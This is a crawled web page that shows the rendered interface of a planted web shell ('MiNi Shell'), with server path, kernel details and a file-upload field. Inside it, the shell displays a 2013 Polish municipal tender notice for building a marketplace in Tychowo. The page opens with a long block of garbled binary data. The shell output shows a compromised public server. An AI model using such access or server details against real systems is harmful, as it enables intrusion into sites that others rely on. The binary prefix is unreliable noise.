JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130820/164919-N-2013.html

<p class="kh_header"><b>Tychowo: Budowa stałego targowiska miejskiego Mój Rynek przy ul. Targowej w Tychowie.</b><br>
<b>Numer ogłoszenia: 164919 - 2013; data zamieszczenia: 20.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tychowo , ul. Bobolicka 17, 78-220 Tychowo, woj. zachodniopomorskie, tel. 94 3115130, faks 94 3115566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.tychowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa stałego targowiska miejskiego Mój Rynek przy ul. Targowej w Tychowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa stałego targowiska miejskiego Mój Rynek przy ul. Targowej w Tychowie, dz. nr 162.10 z przyłączami w dz. nr 162.9, 162.14 i 163.1, obręb 0001 miasto Tychowo, w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013. Przedmiot zamówienia obejmuje Zaplecze socjalne budowę budynku socjalnego o wymiarach 7,4m x 6 m  na fundamentach żelbetowych, parterowego, niepodpiwniczonego, z dachem dwuspadowym w technologii tradycyjnej, murowanej. Ściany zewnętrzne z bloczków betonu komórkowego  gr. 24 cm na zaprawie klejowej ocieplone styropianem gr. 10 cm, wewnętrzne z bloczków betonu komórkowego gr. 8cm. Ściany fundamentowe z bloczków betonowych z ociepleniem gr. 5 cm. Więźba dachowa  drewniana. Połać dachowa przykryta blachodachówką na łatach. Dach  ocieplony wełną mineralną gr. 15 cm. Elewacja  ściany zewnętrzne pokryte wyprawą systemową lekką mokrą. Na ścianach wewnętrznych tynk cementowo wapienny kat. III, sufit   płyty gipsowo  kartonowe wodo i ognioodporne. Ściany i sufity pomalowane będą farbą emulsyjną. Okładziny ścian w sanitariatach i łazienkach  glazura do wysokości 2m. Posadzki z płytek gres. Wiatę targową - zadaszenia nad częścią placu handlowego o wymiarach 12 x 10m, konstrukcja drewniana wsparta na drewnianych słupach. Więźba dachowa drewniany wiązar kratowy.  Konstrukcja więźby dachowej oraz słupy  z drewna sosnowego klasy K27 zabezpieczonego nasyconego środkami przeciwogniowymi i zabezpieczającymi przed wilgocią i korozją biologiczną. Wiata wsparta  na słupach drewnianych o przekroju 24 x 24 cm zamocowanych w stopach betonowych o wymiarach 50x50x80cm zbrojonych 4 prętami gr.16. Słupy zamocowane do stopy klamrami ciesielskimi przyspawanymi do stalowych marek. Zadaszenie wiaty  z blachodachówki zamontowanej na łatach 60x40mm w rozstawie wysokości fali blachy dachówkowej. Wysokość wiaty  5,85 m od podstawy. Wysokość wiązara  234 cm, rozpiętość 1202 cm.  Ogrodzenia części targowej  stalowe ocynkowane systemowe z drutu 4mm o wymiarach oczek 7 x20 cm. Siatka umocowana w stalowym ocynkowanym ceowniku tworząca segment o wymiarach 2,0x2,5m. Segmenty ogrodzenia osadzone  na stalowych ocynkowanych słupkach o wymiarach 6x6 cm. Segmenty połączone  ze słupkami za pomocą systemowych klamer. Brama przesuwna o szerokości 2,5 m, oraz druga bramka ewakuacyjna. Słupki ogrodzenia zamontowane w prefabrykowanym betonowym cokole osadzonym w gruncie. Parking i prace drogowe jak dobudowa placu targowego, nawierzchnia z kostki betonowej gr. 8 cm o wymiarach 10 x 20 cm klasy B35 MP koloru szarego, podsypka cementowo piaskowa 1 do 4 o gr. 5 cm, podbudowa z kruszywa łamanego o ciągłości frakcji od 0,00 mm do 31,5 mm, stabilizowana mechanicznie przy wskaźniku zagęszczenia Is = 1,03, podsypka piaskowa  pospółka przy wskaźniku zagęszczenia Is = 1,03, grunt rodzimy przy wskaźniku zagęszczenia Is = 0,98 do Is = 1,00, Utwardzenie placu targowego: nawierzchnia z kostki betonowej gr. 6cm o wymiarach 10x20cm klasy B35 MP koloru szarego, podsypka cementowo piaskowa 1 do 4 o gr. 3 cm, podbudowa z kruszywa łamanego o ciągłości frakcji od 0,00 mm do 31,5 mm, stabilizowana mechanicznie przy wskaźniku zagęszczenia Is = 1,03, warstwa odsączająca z pospółki gr. 10cm przy wskaźniku zagęszczenia Is=1,03, grunt rodzimy przy wskaźniku zagęszczenia Is = 0,98 do Is = 1,00. Krawężniki jezdni i parkingów o wymiarach 15x30 cm, ustawione na ławie betonowej z oporem, o powierzchni f = 0,0575 m2. W miejscach najazdowych do parkingów krawężnik typu najazdowego o świetle + 2 cm. W jezdni przy krawężniku drogowym w celu odprowadzenia wód opadowych z placu targowego, jezdni i parkingu samochodów dostawczych montaż koryt  PCV 160 mm przykryte rusztem żeliwnym.  Po zagęszczeniu i uwałowaniu na jezdni, parkingach i placu targowym spoiny zamulić piaskiem drobnoziarnistym. Oświetlenie budynku sanitarnego i w wiacie zastosować osprzęt i lampy bryzgoszczelne. W budynku zamontować 10 lamp wewnątrz i 2 na zewnątrz przy drzwiach wejściowych. Jako źródła światła zastosować żarówki energooszczędne typ LED 6W 230V, 500 lm, światło białe ciepłe, trzonek E27. Oświetlenie wiaty   wykonać oprawami przemysłowymi świetlówkowymi z kloszem hermetycznym, ze źródłem światła po dwie  świetlówki o mocy 18 W. Oświetlenie terenu   latarnia szt. 1 z lampą solarną typu Leddy modena  lub równoważną, z panelem fotowoltaicznym min. 30 W, akumulatorem min. 2 x 7Ah/12 V,  z dwoma kloszami na słupie o wysokości lampy do klosza h = 2,55 m, źródło światła 2 x LED 3W, z podstawą systemową fundamentem prefabrykowanym. Linia zasilająca elektroenergetyczna  oświetlenia budynku i wiaty. Z istniejącego złącza kablowo-pomiarowego szafkę sterowniczo-rozdzielcza zasilić kablem  YAKXs 4x25mm2. Rozdzielnice budynku socjalnego zasilić kablem YKY 3x6mm2, natomiast wiatę zasilić kablem YKY5x6mm2. Gniazdo 3faz 16A zasilić przewodem YDY 5x2,5mm2. Przewody w pomieszczeniu socjalnym układać pod tynkiem lub w rurkach, natomiast instalacje wiaty układać w rurkach osłonowych. Kable układać w rowie na głębokości 0,7m w warstwie piasku 0,2m. Po zasypaniu ziemią wys. 0,25m nad kablem ułożyć folię winidurową niebieską o szerokości 0,2m i grubości 0,4 do 0,6mm. Zasypać wykop pozostałym gruntem rodzimym. Przy kolizjach z innymi sieciami oraz wjazdów na posesje kabel ułożyć w rurze ochronnej. Całość wykonać zgodnie z opisem technicznym i normą PN76 E 05125. Przyłącza wodno  kanalizacyjne, przedłużenie sieci wodociągowej PE HD.PN10.dn 160 mm = 56,25 m, przyłącze wodociągowe PE HD.PN10. dn 40 mm =7 m. Przyłącze kanalizacji ściekowej PVC dn 160 mm o długości 61,44 m, z 3-ma studzienkami dn 400 mm, h= 1,8 m,1,4 m i 0,9 m. Ławki wypoczynkowe  typu parkowego z oparciem i długością siedziska min. 2,0 m, szt. 2. Pojemniki do selektywnej zbirki odpadów  szt. 4, o pojemności 240 l każdy, typu C240 F  lub równoważne. Stoły targowe  szt. 6. o wymiarach powierzchni blatu 3,00 m x 1,50 m , wysokości blatu nad podłoże 1,00 m, konstrukcja z drewna iglastego, blaty z drewna liściastego np. dąb, buk lub wiąz. Wykonanie i montaż tablicy informacyjnej  PROW na lata 2007 do 2013 zgodnie z wytycznymi zawartymi w KSIĘDZE  WIZUALIZACJI ZNAKU PROGRAMU ROZWOJU OBSZARÓW WIEJSKICH NA LATA 2007 do 2013  obowiązującej od dnia 20.07.2011 r. Szczegółowe określenie przedmiotu zamówienia zawiera dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych, które stanowią załączniki do niniejszej SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.40-6, 45.21.13.10-5, 45.31.12.00-2, 45.33.00.00-9, 45.23.32.28-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w wysokości 2.000,00 zł, słownie dwa tysiąc złotych, w pieniądzu na konto 10 8562 0007 0050 0050 2000 0170   lub każdej formie przewidzianej w art. 45.ust. 6. Dokument potwierdzający wpłatę wadium w pieniądzu należy dołączyć do oferty jako potwierdzoną kopię, natomiast pozostałe formy w oryginale.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wskaże, że  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 50% przedstawionej ceny ofertowej  oraz posiada środki finansowe  lub zdolność kredytową na kwotę równą co najmniej 100% przedstawionej ceny ofertowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.tychowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tychowie, ul. Bobolicka 17, 78-220 Tychowo.
bip.tychowo.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2013 godzina 10:00, miejsce: Urząd Miejski w Tychowie, ul. Bobolicka 17, 78-220 Tychowo..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW na lata 2007-2013 w ramach działania Podstawowe Usługi Dla Gospodarki i Ludności Wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com